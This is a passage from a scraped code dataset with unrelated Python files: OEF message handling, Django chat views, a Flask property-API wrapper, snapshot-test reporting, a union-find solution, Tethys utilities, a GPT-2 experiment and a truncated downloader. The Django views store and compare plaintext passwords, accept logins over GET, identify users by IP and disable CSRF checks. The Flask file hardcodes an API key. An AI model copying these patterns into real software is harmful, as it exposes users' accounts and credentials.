\"search_result\"\n\n def __str__(self):\n \"\"\"Get string representation.\"\"\"\n return self.value\n\n class OEFErrorOperation(Enum):\n \"\"\"Operation code for the OEF. 
It is returned in the OEF Error messages.\"\"\"\n\n REGISTER_SERVICE = 0\n UNREGISTER_SERVICE = 1\n SEARCH_SERVICES = 2\n SEARCH_SERVICES_WIDE = 3\n SEARCH_AGENTS = 4\n SEND_MESSAGE = 5\n REGISTER_AGENT = 6\n UNREGISTER_AGENT = 7\n\n OTHER = 10000\n\n def __str__(self):\n \"\"\"Get string representation.\"\"\"\n return str(self.value)\n\n def __init__(self, oef_type: Optional[Type] = None,\n **kwargs):\n \"\"\"\n Initialize.\n\n :param oef_type: the type of OEF message.\n \"\"\"\n super().__init__(type=oef_type, **kwargs)\n assert self.check_consistency(), \"OEFMessage initialization inconsistent.\"\n\n def check_consistency(self) -> bool:\n \"\"\"Check that the data is consistent.\"\"\"\n try:\n assert self.is_set(\"type\")\n oef_type = OEFMessage.Type(self.get(\"type\"))\n if oef_type == OEFMessage.Type.REGISTER_SERVICE:\n assert self.is_set(\"id\")\n assert self.is_set(\"service_description\")\n assert self.is_set(\"service_id\")\n service_description = self.get(\"service_description\")\n service_id = self.get(\"service_id\")\n assert isinstance(service_description, Description)\n assert isinstance(service_id, str)\n elif oef_type == OEFMessage.Type.REGISTER_AGENT:\n assert self.is_set(\"id\")\n assert self.is_set(\"agent_description\")\n assert self.is_set(\"agent_id\")\n agent_description = self.get(\"agent_description\")\n agent_id = self.get(\"agent_id\")\n assert isinstance(agent_description, Description)\n assert isinstance(agent_id, str)\n elif oef_type == OEFMessage.Type.UNREGISTER_SERVICE:\n assert self.is_set(\"id\")\n assert self.is_set(\"service_description\")\n assert self.is_set(\"service_id\")\n service_description = self.get(\"service_description\")\n service_id = self.get(\"service_id\")\n assert isinstance(service_description, Description)\n assert isinstance(service_id, str)\n elif oef_type == OEFMessage.Type.UNREGISTER_AGENT:\n assert self.is_set(\"id\")\n assert self.is_set(\"agent_description\")\n assert self.is_set(\"agent_id\")\n agent_description = self.get(\"agent_description\")\n agent_id = self.get(\"agent_id\")\n assert isinstance(agent_description, Description)\n assert isinstance(agent_id, str)\n elif oef_type == OEFMessage.Type.SEARCH_SERVICES:\n assert self.is_set(\"id\")\n assert self.is_set(\"query\")\n query = self.get(\"query\")\n assert isinstance(query, Query)\n elif oef_type == OEFMessage.Type.SEARCH_AGENTS:\n assert self.is_set(\"id\")\n assert self.is_set(\"query\")\n query = self.get(\"query\")\n assert isinstance(query, Query)\n elif oef_type == OEFMessage.Type.SEARCH_RESULT:\n assert self.is_set(\"id\")\n assert self.is_set(\"agents\")\n agents = cast(List[str], self.get(\"agents\"))\n assert type(agents) == list and all(type(a) == str for a in agents)\n elif oef_type == OEFMessage.Type.OEF_ERROR:\n assert self.is_set(\"id\")\n assert self.is_set(\"operation\")\n operation = self.get(\"operation\")\n assert operation in set(OEFMessage.OEFErrorOperation)\n elif oef_type == OEFMessage.Type.DIALOGUE_ERROR:\n assert self.is_set(\"id\")\n assert self.is_set(\"dialogue_id\")\n assert self.is_set(\"origin\")\n else:\n raise ValueError(\"Type not recognized.\")\n except (AssertionError, ValueError):\n return False\n\n return True\n","sub_path":"aea/protocols/oef/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":5801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"608584818","text":"from django.http import JsonResponse\nfrom django.shortcuts import render, HttpResponse, 
HttpResponseRedirect\nfrom .forms import SignUpForm, LoginForm, ChatIdForm\nfrom .models import ChatUser, Chat\nimport locale\nimport time\nfrom django.views.decorators.csrf import csrf_exempt\nfrom . import utils\nimport socket\nfrom .utils import get_ip\nfrom djangoChat.settings import STATIC_URL\nfrom django.utils import timezone\n\n# Create your views here.\n\ndef home(request):\n usernametohtml = \"\"\n usernameBool = False\n ip, pc = get_ip(request)\n suForm = SignUpForm()\n if request.POST.get(\"name\"):\n for chatuser in ChatUser.objects.all():\n if chatuser.name == request.POST.get(\"name\"):\n return render(request, 'chat/index.html',\n {'formSignUp': SignUpForm, 'formLogin': LoginForm, 'ip': ip, 'restart': False,\n 'errorSignUp': True})\n utils.user['name'] = request.POST.get(\"name\")\n utils.user['password'] = request.POST.get(\"password\")\n utils.user['email'] = request.POST.get(\"email\")\n utils.user['dateOfBirth'] = request.POST.get(\"dateOfBirth\")\n utils.user['ip'] = \" \" + ip\n utils.user['lastPC'] = pc\n locale.setlocale(locale.LC_TIME, \"ru_RU\")\n date = time.strftime(\"%Y-%m-%d\")\n if not request.POST.get(\"dateOfBirth\"):\n utils.user['dateOfBirth'] = date\n a = ChatUser.objects.create(name=utils.user[\"name\"], email=utils.user[\"email\"], password=utils.user[\"password\"], dateOfBirth=utils.user['dateOfBirth'], ip=utils.user['ip'], lastPC=utils.user['lastPC'])\n a.save()\n return render(request, 'chat/index.html', {'formSignUp': SignUpForm, 'formLogin': LoginForm, 'ip': ip, 'date': date, 'restart': True, })\n\n done = False\n for chatuser in ChatUser.objects.all():\n if chatuser.ip:\n for cIp in chatuser.ip.split(' '):\n if cIp == ip:\n utils.user['name'] = chatuser.name\n usernametohtml = chatuser.name\n usernameBool = True\n print(chatuser, chatuser.chat_set.all(), \" ll\")\n done = True\n\n if not done:\n utils.user = {}\n\n if request.GET.get(\"loginName\"):\n print(\"request.get()\")\n done = False\n for chatuser in ChatUser.objects.all():\n if chatuser.name == request.GET.get(\"loginName\") and chatuser.password == request.GET.get(\"loginPassword\"):\n chatuser.ip = chatuser.ip + \" \" + ip\n chatuser.lastPC = socket.gethostname()\n chatuser.save()\n utils.user['name'] = request.GET.get(\"loginName\")\n utils.user['lastPC'] = socket.gethostname()\n print(chatuser.ip)\n done = True\n return HttpResponseRedirect('/home/')\n if not done:\n utils.user = {}\n return render(request, 'chat/index.html', {'formSignUp': SignUpForm, 'formLogin': LoginForm, 'ip': ip, 'restart': False, 'error': True})\n\n return render(request, 'chat/index.html', {'formSignUp': suForm, 'formLogin': LoginForm, 'ip': ip, 'username': usernametohtml, 'userBool': usernameBool})\n\n\n\ndef index(request):\n return HttpResponseRedirect(\"/home/\")\n\n\n@csrf_exempt\ndef chats(request):\n utils.allchats = []\n usersToLogout = []\n chatIdForm = ChatIdForm()\n ip, pc = get_ip(request)\n\n done=False\n for chatuser in ChatUser.objects.all():\n if request.GET.get(f\"check{chatuser.id}\"):\n usersToLogout.append(chatuser.id)\n done = True\n if done:\n print(usersToLogout)\n for userId in usersToLogout:\n logoutuser = ChatUser.objects.get(id=userId)\n if logoutuser.ip:\n for cIp in logoutuser.ip.split(\" \"):\n if cIp == ip:\n logoutuser.ip = logoutuser.ip.split(\" \")\n logoutuser.ip.remove(cIp)\n logoutuser.ip = ' '.join(logoutuser.ip)\n logoutuser.lastPC = ''\n logoutuser.save()\n return HttpResponseRedirect(\"/chats/\")\n\n\n done = False\n for chatuser in ChatUser.objects.all():\n if 
chatuser.ip:\n for cIp in chatuser.ip.split(' '):\n print(f'{ip}-{cIp}')\n if cIp == ip and chatuser.lastPC == pc:\n print()\n utils.user['name'] = chatuser.name\n print(chatuser, chatuser.chat_set.all())\n done = True\n for c in chatuser.chat_set.all():\n print(c)\n if c not in utils.allchats:\n utils.allchats.append(c)\n\n for cUser2 in ChatUser.objects.all():\n if cUser2.id != chatuser.id:\n print(\"-d\")\n if chatuser.lastPC == cUser2.lastPC and chatuser.lastPC and cUser2.lastPC:\n print('okokok')\n string = str(chatuser.lastPC)\n string += str(cUser2.lastPC)\n print(chatuser, cUser2)\n usersWithOnePc = []\n\n for u in ChatUser.objects.all():\n for j in ChatUser.objects.all():\n if u != j:\n if u.lastPC == j.lastPC and u.lastPC and j.lastPC:\n if u not in usersWithOnePc:\n usersWithOnePc.append(u)\n if j not in usersWithOnePc:\n usersWithOnePc.append(j)\n\n return render(request, 'chat/LogOut.html', {'cUser2': cUser2, 'chatuser': chatuser, 'UWOP': usersWithOnePc})\n\n else:\n print(1111111)\n\n\n if not done:\n return HttpResponse(\"
Sign up or login please <br> <a href='/home/'>Go Home page</a>
\")\n\n for c in Chat.objects.all():\n for member in c.members.split(\" \"):\n if member == utils.user['name']:\n print(member)\n for j in Chat.objects.filter(id=c.id):\n if j not in utils.allchats:\n utils.allchats.append(j)\n\n if request.POST.get(\"chatId\"):\n chat = Chat.objects.get(id = request.POST.get(\"chatId\"))\n if chat:\n chat.members += \" \" + str(utils.user['name'])\n chat.save()\n return HttpResponseRedirect(\"/chats/\")\n\n utils.allchats.sort(key=lambda x: x.lastMessageTime, reverse=True)\n return render(request, 'chat/chats.html', {'chats': utils.allchats, 'chatIdForm': chatIdForm, 'username': utils.user['name'], 'userBool': True})\n\n\n\n\ndef chatView(request, chat_id):\n pc = socket.gethostname()\n ip, pc = get_ip(request)\n try:\n a = Chat.objects.get(id=chat_id)\n except:\n return HttpResponse(\"404 Errror\")\n\n done = False\n for chatuser in ChatUser.objects.all():\n if chatuser.ip:\n for cIp in chatuser.ip.split(' '):\n print(f'{ip}-{cIp}')\n if cIp == ip and chatuser.lastPC == pc:\n print()\n utils.user['name'] = chatuser.name\n print(chatuser, chatuser.chat_set.all())\n done = True\n\n if request.is_ajax():\n data = {\n 'author_name': request.POST.get('author_name'),\n 'messageText': request.POST.get('messageText'),\n }\n locale.setlocale(locale.LC_TIME, \"ru_RU\")\n data['pub_date'] = time.strftime(\"%d %B %Y г. %H:%M\")\n\n a.message_set.create(author_name=data['author_name'],messageText=data['messageText'],pub_date=timezone.now())\n a.save()\n\n return JsonResponse(data)\n\n chat = Chat.objects.get(id=chat_id)\n messages_set = chat.message_set.order_by('pub_date')\n messages = []\n for m in messages_set:\n if m.author_name == utils.user['name']:\n messages.append({\n 'author_name': m.author_name,\n 'messageText': m.messageText,\n 'pub_date': m.pub_date,\n 'sender': 'me'\n })\n else:\n messages.append({\n 'author_name': m.author_name,\n 'messageText': m.messageText,\n 'pub_date': m.pub_date,\n 'sender': 'you'\n })\n return render(request, 'chat/chat.html', {'chatId': chat_id, 'messages': messages, 'username':utils.user['name'], 'static': STATIC_URL})\n\n\n\n\ndef logout(request):\n ip, pc = get_ip(request)\n for chatuser in ChatUser.objects.all():\n if chatuser.ip:\n for cIp in chatuser.ip.split(' '):\n print(f'{ip}-{cIp}')\n if cIp == ip:\n print(\"=============\")\n chatuser.ip = chatuser.ip.split(' ')\n chatuser.ip.remove(cIp)\n chatuser.ip = ' '.join(chatuser.ip)\n print(chatuser.ip.split(' '))\n print(chatuser.ip)\n chatuser.lastPC = ''\n chatuser.save()\n return HttpResponseRedirect(\"/home/\")\n\ndef changePassword(request):\n pass\n\n","sub_path":"chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"471051631","text":"from flask import Flask, request\nfrom flask_restplus import Resource, Api, fields\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\nimport requests, datetime, re\nimport operator, functools\nimport urllib.request\nimport json\n\napp = Flask(__name__)\napp.config.SWAGGER_UI_DOC_EXPANSION = 'list'\napi = Api(app,\n title = \"Assignment 2 - Harris Phan's Section - Properties\")\n \nsuburb_model = api.model('suburb', {\n 'suburb': fields.String(),\n})\n\nsuburb_model = api.model('suburb', {\n 'suburb': fields.Integer(),\n})\n\nparams = {\n 'api_key': 'key_2ea69bf3540b176b4b95eb87e6e97d67',\n}\n\ndef AddressLocator(suburb):\n url_endpoint = 
f'https://api.domain.com.au/v1/addressLocators?searchLevel=Suburb&suburb={suburb}&state=NSW'\n    return url_endpoint\n    \ndef PropertyPrices(suburbId):\n    url_endpoint = f'https://api.domain.com.au/v1/suburbPerformanceStatistics?state=nsw&suburbId={suburbId}&propertyCategory=house&chronologicalSpan=12&tPlusFrom=1&tPlusTo=3&values=HighestSoldPrice%2CLowestSoldPrice'\n    return url_endpoint\n\n@api.route('/addressLocators')\nclass Suburb(Resource):\n    @api.doc(description = \"Get Suburb IDs\")\n    @api.response(200, 'Successful retrieval')\n    @api.response(201, 'Successful creation')\n    @api.response(400, 'Unable to retrieve or create')\n    @api.expect(suburb_model)\n    def post(self):\n        suburb = request.json['suburb']\n        if ' ' in suburb:\n            suburb = suburb.replace(' ', '%20').strip()\n        response = requests.get(AddressLocator(suburb),params=params).json()[0]\n        \n        data_collection = {\n            #\"suburb\": str(response['addressComponents'][0]['shortName']),\n            \"suburb\": response['addressComponents'][0]['shortName'],\n            \"suburb_id\": response['ids'][0]['id']\n        }\n        \n        return data_collection\n\n#@api.route('/suburbPerformanceStatistics')\n#class HousePrices(Resource):\n#    @api.doc(description = \"Get House prices for a suburb ID\")\n#    @api.response(200, 'Successful retrieval')\n#    @api.response(201, 'Successful creation')\n#    @api.response(400, 'Unable to retrieve or create')\n#    @api.expect(suburb_id)\n#    def post(self):\n#        suburb_id = request.json['suburb_id']\n    \n    \n\nif __name__ == '__main__':\n\n    app.run(debug=True)\n\n\n    ","sub_path":"tools/harris-api/domainAPI.py","file_name":"domainAPI.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"119658106","text":"from gettext import (\n    gettext,\n    ngettext,\n)\nfrom pathlib import Path\nfrom typing import (\n    TYPE_CHECKING,\n    Any,\n    Iterator,\n    List,\n    Set,\n)\n\nimport attr\n\nfrom .data import (\n    Snapshot,\n    SnapshotFossil,\n    SnapshotFossils,\n    SnapshotUnknownFossil,\n)\nfrom .location import TestLocation\nfrom .terminal import (\n    bold,\n    error_style,\n    green,\n    success_style,\n    warning_style,\n)\n\n\nif TYPE_CHECKING:\n    from .assertion import SnapshotAssertion  # noqa: F401\n\n\n@attr.s\nclass SnapshotReport:\n    base_dir: str = attr.ib()\n    all_items: Set[Any] = attr.ib()\n    ran_items: Set[Any] = attr.ib()\n    update_snapshots: bool = attr.ib()\n    is_providing_paths: bool = attr.ib()\n    is_providing_nodes: bool = attr.ib()\n    warn_unused_snapshots: bool = attr.ib()\n    assertions: List[\"SnapshotAssertion\"] = attr.ib()\n    discovered: \"SnapshotFossils\" = attr.ib(factory=SnapshotFossils)\n    created: \"SnapshotFossils\" = attr.ib(factory=SnapshotFossils)\n    failed: \"SnapshotFossils\" = attr.ib(factory=SnapshotFossils)\n    matched: \"SnapshotFossils\" = attr.ib(factory=SnapshotFossils)\n    updated: \"SnapshotFossils\" = attr.ib(factory=SnapshotFossils)\n    used: \"SnapshotFossils\" = attr.ib(factory=SnapshotFossils)\n\n    def __attrs_post_init__(self) -> None:\n        for assertion in self.assertions:\n            self.discovered.merge(assertion.extension.discover_snapshots())\n            for result in assertion.executions.values():\n                snapshot_fossil = SnapshotFossil(location=result.snapshot_location)\n                snapshot_fossil.add(\n                    Snapshot(name=result.snapshot_name, data=result.final_data)\n                )\n                self.used.update(snapshot_fossil)\n                if result.created:\n                    self.created.update(snapshot_fossil)\n                elif result.updated:\n                    
self.updated.update(snapshot_fossil)\n elif result.success:\n self.matched.update(snapshot_fossil)\n else:\n self.failed.update(snapshot_fossil)\n\n @property\n def num_created(self) -> int:\n return self._count_snapshots(self.created)\n\n @property\n def num_failed(self) -> int:\n return self._count_snapshots(self.failed)\n\n @property\n def num_matched(self) -> int:\n return self._count_snapshots(self.matched)\n\n @property\n def num_updated(self) -> int:\n return self._count_snapshots(self.updated)\n\n @property\n def num_unused(self) -> int:\n return self._count_snapshots(self.unused)\n\n @property\n def ran_all_collected_tests(self) -> bool:\n return self.all_items == self.ran_items and not self.is_providing_nodes\n\n @property\n def unused(self) -> \"SnapshotFossils\":\n unused_fossils = SnapshotFossils()\n for unused_snapshot_fossil in self._diff_snapshot_fossils(\n self.discovered, self.used\n ):\n snapshot_location = unused_snapshot_fossil.location\n if self.is_providing_paths and not any(\n TestLocation(node).matches_snapshot_location(snapshot_location)\n for node in self.ran_items\n ):\n continue\n\n if self.ran_all_collected_tests:\n unused_snapshots = {*unused_snapshot_fossil}\n mark_for_removal = snapshot_location not in self.used\n else:\n unused_snapshots = {\n snapshot\n for snapshot in unused_snapshot_fossil\n if any(\n TestLocation(node).matches_snapshot_name(snapshot.name)\n for node in self.ran_items\n )\n }\n mark_for_removal = False\n\n if unused_snapshots:\n marked_unused_snapshot_fossil = SnapshotFossil(\n location=snapshot_location\n )\n for snapshot in unused_snapshots:\n marked_unused_snapshot_fossil.add(snapshot)\n unused_fossils.add(marked_unused_snapshot_fossil)\n elif mark_for_removal:\n unused_fossils.add(SnapshotUnknownFossil(location=snapshot_location))\n return unused_fossils\n\n @property\n def lines(self) -> Iterator[str]:\n summary_lines: List[str] = []\n if self.num_failed:\n summary_lines.append(\n ngettext(\n \"{} snapshot failed.\", \"{} snapshots failed.\", self.num_failed,\n ).format(error_style(self.num_failed))\n )\n if self.num_matched:\n summary_lines.append(\n ngettext(\n \"{} snapshot passed.\", \"{} snapshots passed.\", self.num_matched,\n ).format(success_style(self.num_matched))\n )\n if self.num_created:\n summary_lines.append(\n ngettext(\n \"{} snapshot generated.\",\n \"{} snapshots generated.\",\n self.num_created,\n ).format(green(self.num_created))\n )\n if self.num_updated:\n summary_lines.append(\n ngettext(\n \"{} snapshot updated.\", \"{} snapshots updated.\", self.num_updated,\n ).format(green(self.num_updated))\n )\n if self.num_unused:\n if self.update_snapshots:\n text_singular = \"{} unused snapshot deleted.\"\n text_plural = \"{} unused snapshots deleted.\"\n else:\n text_singular = \"{} snapshot unused.\"\n text_plural = \"{} snapshots unused.\"\n if self.update_snapshots or self.warn_unused_snapshots:\n text_count = warning_style(self.num_unused)\n else:\n text_count = error_style(self.num_unused)\n summary_lines.append(\n ngettext(text_singular, text_plural, self.num_unused).format(text_count)\n )\n yield \" \".join(summary_lines)\n\n if self.num_unused:\n yield \"\"\n if self.update_snapshots:\n for snapshot_fossil in self.unused:\n filepath = snapshot_fossil.location\n snapshots = (snapshot.name for snapshot in snapshot_fossil)\n path_to_file = str(Path(filepath).relative_to(self.base_dir))\n deleted_snapshots = \", \".join(map(bold, sorted(snapshots)))\n yield warning_style(gettext(\"Deleted\")) + \" {} 
({})\".format(\n deleted_snapshots, path_to_file\n )\n else:\n message = gettext(\n \"Re-run pytest with --snapshot-update to delete unused snapshots.\"\n )\n if self.warn_unused_snapshots:\n yield warning_style(message)\n else:\n yield error_style(message)\n\n def _diff_snapshot_fossils(\n self, snapshot_fossils1: \"SnapshotFossils\", snapshot_fossils2: \"SnapshotFossils\"\n ) -> \"SnapshotFossils\":\n diffed_snapshot_fossils: \"SnapshotFossils\" = SnapshotFossils()\n for snapshot_fossil1 in snapshot_fossils1:\n snapshot_fossil2 = snapshot_fossils2.get(\n snapshot_fossil1.location\n ) or SnapshotFossil(location=snapshot_fossil1.location)\n diffed_snapshot_fossil = SnapshotFossil(location=snapshot_fossil1.location)\n for snapshot in snapshot_fossil1:\n if not snapshot_fossil2.get(snapshot.name):\n diffed_snapshot_fossil.add(snapshot)\n diffed_snapshot_fossils.add(diffed_snapshot_fossil)\n return diffed_snapshot_fossils\n\n def _count_snapshots(self, snapshot_fossils: \"SnapshotFossils\") -> int:\n return sum(len(snapshot_fossil) for snapshot_fossil in snapshot_fossils)\n","sub_path":"src/syrupy/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":7940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"464142407","text":"class unionFindSet:\n def __init__(self):\n self.father = dict()\n self.rank = dict()\n self.count = 0\n def make_set(self, x):\n self.father[x] = x\n self.rank[x] = 0\n self.count += 1\n def union(self,x,y):\n self.link(self.find_father(x), self.find_father(y))\n def link(self,x,y):\n if x == y:\n pass\n else:\n self.count -= 1\n if self.rank[x] > self.rank[y]:\n self.father[y] = x\n else:\n self.father[x] = y\n if self.rank[x] == self.rank[y]:\n self.rank[y] += 1\n def find_father(self,x):\n if self.father[x] != x:\n self.father[x] = self.find_father(self.father[x])\n return self.father[x]\n \nclass Solution:\n def numSimilarGroups(self, A):\n \"\"\"\n :type A: List[str]\n :rtype: int\n \"\"\"\n if len(A) == 0 or len(A[0]) == 0: return 0\n L = len(A[0])\n N = len(A)\n ufs = unionFindSet()\n for x in A:\n ufs.make_set(x)\n if L < N: # too many words \n A_set = set(A)\n for word in A:\n for i in range(L):\n for j in range(i+1, L):\n new_word = word[:i] + word[j] + word[i+1:j] + word[i] + word[j+1:]\n if new_word in A_set:\n ufs.union(word, new_word)\n else: # too long words\n for i in range(N):\n for j in range(i+1, N):\n if self.similar(A[i], A[j]):\n ufs.union(A[i], A[j])\n return ufs.count\n \n def similar(self, word1, word2):\n count = 0\n for char1, char2 in zip(word1, word2):\n if char1 != char2:\n count += 1\n if count > 2: return False \n return True\n","sub_path":"Similar-String-Groups.py","file_name":"Similar-String-Groups.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"379292830","text":"\"\"\"\n********************************************************************************\n* Name: utilities.py\n* Author: Nathan Swain\n* Created On: 2014\n* Copyright: (c) Brigham Young University 2014\n* License: BSD 2-Clause\n********************************************************************************\n\"\"\"\nimport os\n\nfrom django.conf.urls import url\nfrom django.contrib.staticfiles import utils\nfrom django.contrib.staticfiles.finders import BaseFinder\nfrom django.core.files.storage import FileSystemStorage\nfrom django.utils._os import safe_join\nfrom collections import OrderedDict as 
SortedDict\n\nfrom tethys_apps.app_harvester import SingletonAppHarvester\n\n# Other dependency imports DO NOT ERASE\nfrom tethys_services.utilities import get_dataset_engine\n\n\ndef generate_app_url_patterns():\n \"\"\"\n Generate the url pattern lists for each app and namespace them accordingly.\n \"\"\"\n\n # Get controllers list from app harvester\n harvester = SingletonAppHarvester()\n apps = harvester.apps\n app_url_patterns = dict()\n\n for app in apps:\n if hasattr(app, 'url_maps'):\n url_maps = app.url_maps()\n elif hasattr(app, 'controllers'):\n url_maps = app.controllers()\n else:\n url_maps = None\n\n if url_maps:\n for url_map in url_maps:\n app_root = app.root_url\n app_namespace = app_root.replace('-', '_')\n\n if app_namespace not in app_url_patterns:\n app_url_patterns[app_namespace] = []\n\n # Create django url object\n if isinstance(url_map.controller, basestring):\n controller_parts = url_map.controller.split('.')\n module_name = '.'.join(controller_parts[:-1])\n function_name = controller_parts[-1]\n try:\n module = __import__(module_name, fromlist=[function_name])\n except ImportError:\n raise ValueError('\"{0}\" is not a valid controller function.'.format(url_map.controller))\n try:\n controller_function = getattr(module, function_name)\n except AttributeError:\n raise ValueError('\"{0}\" is not a valid controller function.'.format(url_map.controller))\n else:\n controller_function = url_map.controller\n django_url = url(url_map.url, controller_function, name=url_map.name)\n\n # Append to namespace list\n app_url_patterns[app_namespace].append(django_url)\n\n return app_url_patterns\n\n\ndef get_directories_in_tethys_apps(directory_names, with_app_name=False):\n # Determine the tethysapp directory\n tethysapp_dir = safe_join(os.path.abspath(os.path.dirname(__file__)), 'tethysapp')\n\n # Assemble a list of tethysapp directories\n tethysapp_contents = os.listdir(tethysapp_dir)\n tethysapp_match_dirs = []\n\n for item in tethysapp_contents:\n item_path = safe_join(tethysapp_dir, item)\n\n # Check each directory combination\n for directory_name in directory_names:\n # Only check directories\n if os.path.isdir(item_path):\n match_dir = safe_join(item_path, directory_name)\n\n if match_dir not in tethysapp_match_dirs and os.path.isdir(match_dir):\n if not with_app_name:\n tethysapp_match_dirs.append(match_dir)\n else:\n tethysapp_match_dirs.append((item, match_dir))\n\n return tethysapp_match_dirs\n\n\nclass TethysAppsStaticFinder(BaseFinder):\n \"\"\"\n A static files finder that looks in each app in the tethysapp directory for static files.\n This finder search for static files in a directory called 'public' or 'static'.\n \"\"\"\n\n def __init__(self, apps=None, *args, **kwargs):\n # List of locations with static files\n self.locations = get_directories_in_tethys_apps(('static', 'public'), with_app_name=True)\n\n # Maps dir paths to an appropriate storage instance\n self.storages = SortedDict()\n\n for prefix, root in self.locations:\n filesystem_storage = FileSystemStorage(location=root)\n filesystem_storage.prefix = prefix\n self.storages[root] = filesystem_storage\n\n super(TethysAppsStaticFinder, self).__init__(*args, **kwargs)\n\n def find(self, path, all=False):\n \"\"\"\n Looks for files in the Tethys apps static or public directories\n \"\"\"\n matches = []\n for prefix, root in self.locations:\n matched_path = self.find_location(root, path, prefix)\n if matched_path:\n if not all:\n return matched_path\n matches.append(matched_path)\n return matches\n\n def 
find_location(self, root, path, prefix=None):\n \"\"\"\n Finds a requested static file in a location, returning the found\n absolute path (or ``None`` if no match).\n \"\"\"\n if prefix:\n prefix = '%s%s' % (prefix, os.sep)\n if not path.startswith(prefix):\n return None\n path = path[len(prefix):]\n path = safe_join(root, path)\n if os.path.exists(path):\n return path\n\n def list(self, ignore_patterns):\n \"\"\"\n List all files in all locations.\n \"\"\"\n for prefix, root in self.locations:\n storage = self.storages[root]\n for path in utils.get_files(storage, ignore_patterns):\n yield path, storage","sub_path":"tethys_apps/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"319352750","text":"from transformers import GPT2LMHeadModel, GPT2Tokenizer\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nMODEL = 'gpt2-medium'\nDEV = 'cuda'\nTOP_K = 10\nLENGTH = 50\nWEIGHTS = [0.01, 0.01]\nWEIGHTS = [0.02]\n\nCOND = 'positive politics'\nCOND = 'negative politics'\nCOND = 'positive'\nCOND = 'negative science'\nCOND = 'positive science'\nCOND = 'negative'\n\nPREFIX = 'To conclude'\nPREFIX = 'The potato'\nPREFIX = 'The following is a negative sentence. The chicken tastes'\n\n\ndef top_k_filtering(logits, top_k=1, filter_value=-float(\"Inf\"), min_tokens_to_keep=1):\n top_k = min(max(top_k, min_tokens_to_keep), logits.size(-1))\n ids_to_remove = logits < torch.topk(logits, top_k)[0][..., -1, None]\n ids_to_retain = torch.topk(logits, top_k)[1][0]\n logits[ids_to_remove] = filter_value\n return logits, ids_to_retain\n\n\ntokenizer = GPT2Tokenizer.from_pretrained(MODEL)\nmodel = GPT2LMHeadModel.from_pretrained(MODEL).to(DEV)\nCOND_IDS = torch.tensor([tokenizer.encode(COND)]).to(DEV)\n\n# embed = model.get_input_embeddings()\n# cond_embeds = embed(COND_IDS)[0]\n# for i in range(cond_embeds.shape[0]):\n# embed.weight.data += WEIGHTS[i] * cond_embeds[i]\n\n\ninput_ids = torch.tensor([tokenizer.encode(PREFIX, add_special_tokens=True)]).to(DEV)\n# past = model(input_ids[:, :-1])[1]\n\nfor t in range(input_ids.shape[1], LENGTH): # +1 for the last time step of prefix\n\n # model = GPT2LMHeadModel.from_pretrained(MODEL).to(DEV)\n # criterion = torch.nn.CrossEntropyLoss()\n # optimizer = torch.optim.SGD(model.parameters(), lr=0.00008)\n # for step in range(1):\n # logits, _ = model(input_ids)\n # loss = criterion(logits[:, -1], COND_IDS[0])\n # model.zero_grad()\n # loss.backward()\n # # clip_grad_norm(model.parameters(), 0.5)\n # optimizer.step()\n\n\n with torch.no_grad():\n logits, _ = model(input_ids)\n logits = logits[:, -1]\n logits, ids_to_retain = top_k_filtering(logits, TOP_K)\n probs = F.softmax(logits, dim=-1)\n next_tokens = torch.multinomial(probs, num_samples=1)\n input_ids = torch.cat([input_ids, next_tokens], dim=-1)\n\nprint(tokenizer.decode(input_ids[0]))\n","sub_path":"ours/method5.py","file_name":"method5.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"204404786","text":"#!/usr/bin/env python3\n\nimport json\nimport sqlite3\nimport random\nimport os\nimport time\nimport logging\nimport logging.handlers\nimport module.acdcli_cmd as acdcli\n\npath = os.path.dirname(os.path.realpath(__file__))\nconfig_path = path + '/config.json'\n\ntry:\n with open(config_path, 'r') as f:\n config = 
json.load(f)\nexcept (OSError, ValueError):\n    # config file is missing or malformed; nothing useful can be done\n    exit()\n\n# logger setting\nlogger = logging.getLogger('downloader logger')\nformatter = logging.Formatter('[%(levelname)s|%(filename)s:%(lineno)s] %(asctime)s > %(message)s')\nfileHandler = logging.handlers.RotatingFileHandler(config['local'] + '/.downloader.log', maxBytes = 1024*1024, backupCount = 5)\nfileHandler.setFormatter(formatter)\nstreamHandler = logging.StreamHandler()\nstreamHandler.setFormatter(formatter)\nlogger.addHandler(fileHandler)\nlogger.addHandler(streamHandler)\nlogger.setLevel(logging.DEBUG)\n\nlocal = config['local']\ndb_path = local + '/.downloader.db'\ntry:\n    with sqlite3.connect(db_path) as con:\n        cur = con.cursor()\n        query = 'select * from config'\n        config = cur.execute(query).fetchone()\n\n        remote = config[1]\n        limit_size = config[3]\n        current_size = config[4]\n        logger.info('-----begin-----')\n        logger.info('remote: ' + remote)\n        logger.info('limit_size: ' + str(limit_size))\n        logger.info('current_size: ' + str(current_size))\n    if limit_size < current_size:\n        logger.info('delete start')\n        with sqlite3.connect(db_path) as con:\n            cur = con.cursor()\n            cur.execute('begin exclusive')\n            query = 'select * from files where status=? order by random() limit 1'\n            file_info = cur.execute(query, ('complete',)).fetchone()\n            logger.info('select, ' + file_info[1])\n            query = 'update files set status=? where hash=?'\n            cur.execute(query, ('incomplete', file_info[0]))\n            con.commit()\n\n        os.remove(local + '/' + file_info[1])\n        logger.info('delete ' + file_info[1] + ' from local')\n\n        with sqlite3.connect(db_path) as con:\n            cur = con.cursor()\n            cur.execute('begin exclusive')\n            query = 'delete from files where hash=?'\n            cur.execute(query, (file_info[0],))\n            query = 'select * from config'\n            config = cur.execute(query).fetchone()\n            query = 'update 